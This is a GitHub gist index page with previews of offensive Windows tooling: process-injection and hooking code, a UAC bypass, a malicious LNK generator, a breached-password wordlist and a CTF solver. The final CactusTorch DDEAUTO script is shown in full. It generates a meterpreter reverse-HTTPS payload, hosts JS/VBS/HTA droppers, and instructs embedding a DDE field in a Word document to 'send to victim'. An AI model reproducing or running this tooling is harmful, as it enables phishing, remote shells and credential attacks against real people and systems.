gavz’s gists

gavz / inject.c

Created December 13, 2017 15:23 — forked from hfiref0x/inject.c

Process Doppelgänging

	//
	// Ref = src
	// https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf
	//

	#include <Windows.h>
	#include <ntstatus.h>
	#include "ntos.h"

	VOID ProcessDoppelgänging(

gavz / Injectable.cpp

Created December 18, 2017 15:32 — forked from anonymous/Injectable.cpp

Simple UserMode Hook Example

	#include <windows.h>
	#include <stdio.h>


	FARPROC fpCreateProcessW;
	BYTE bSavedByte;

	// Blog Post Here:
	// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
	// tasklist \| findstr explore.exe

gavz / breachcompilation.txt

Created December 19, 2017 16:56

1.4 billion password breach compilation wordlist

	wordlist created from original 41G stash via:

	grep -rohP '(?<=:).*$' \| uniq > breachcompilation.txt

	Then, compressed with:

	7z a breachcompilation.txt.7z breachcompilation.txt

	Size:

gavz / syscall_extractor.cpp

Created December 28, 2017 15:42 — forked from hasherezade/syscall_extractor.cpp

Extracts syscalls list from NTDLL.DLL

	#include <stdio.h>
	#include <Windows.h>

	// based on: https://www.evilsocket.net/2014/02/11/on-windows-syscall-mechanism-and-syscall-numbers-extraction-methods/
	// author: @evilsocket
	// modified by: @hasherezade

	#define IS_ADDRESS_BETWEEN( left, right, address ) ( (address) >= (left) && (address) < (right) )
	PIMAGE_SECTION_HEADER SectionByRVA( PIMAGE_SECTION_HEADER pSections, DWORD dwSections, DWORD rva )
	{

gavz / secadmin-angr.py

Created January 1, 2018 21:18

Secadmin 2017 CTF - Reversing with angr

	import angr
	import logging
	import claripy

	def main():
	proj = angr.Project('secadmin', load_options={'auto_load_libs': False})

	argv = [proj.filename]
	argv.append('ctf.hex')

gavz / EventVwrBypass.cs

Created January 4, 2018 17:04 — forked from leoloobeek/EventVwrBypass.cs

Event Viewer UAC Bypass in CSharp for use with InstallUtil.exe

	using System;
	using System.Linq;
	using System.Reflection;
	using System.Configuration.Install;
	using System.Runtime.InteropServices;

	using Microsoft.Win32;
	/*
	InstallUtil.exe C# version of Event Viewer UAC bypass

gavz / DeleteNullRegValue.py

Last active January 10, 2018 15:34 — forked from KyleHanslovan/DeleteNullRegValue.py

gavz / listkmods.py

Created January 10, 2018 20:24 — forked from patois/listkmods.py

ida/vmware kernel debugging helper

	from idaapi import *

	# with code taken from http://hexblog.com/idapro/vmware_modules.py

	class LoadedModulesList(Choose2):

	def __init__(self, title, flags=0, width=None, height=None, embedded=False, modal=False):
	self.ptr = get_name_ea_simple("PsLoadedModuleList")
	if self.ptr == BADADDR:
	raise ValueError('Missing symbol: PsLoadedModuleList')

gavz / Create-LNK.ps1

Created January 21, 2018 12:46 — forked from enigma0x3/Create-LNK.ps1

	function Create-LNKPayload{
	<#
	.SYNOPSIS

	Generates a malicous LNK file

	.PARAMETER LNKName

	Name of the LNK file you want to create.

gavz / CactusTorchDDEAUTO.sh

Created January 21, 2018 15:45 — forked from xillwillx/CactusTorchDDEAUTO.sh

CactusTorchDDEAUTO

	git clone https://github.com/mdsecactivebreach/CACTUSTORCH.git && cd CACTUSTORCH
	IP=`ip -4 addr show eth0 \| grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
	msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=443 -f raw -o payload.bin
	PAYLOAD=$(cat payload.bin \| base64 -w 0)
	sed -i -e 's\|var code = ".*\|var code = "'$PAYLOAD'";\|' CACTUSTORCH.js
	sed -i -e 's\|Dim code : code = ".*\|Dim code : code = "'$PAYLOAD'"\|g' CACTUSTORCH.vbs
	sed -i -e 's\|Dim code : code = ".*\|Dim code : code = "'$PAYLOAD'"\|g' CACTUSTORCH.hta
	cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta
	service apache2 start
	echo -e "\n\n\n\nOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\nJS PAYLOAD:\n\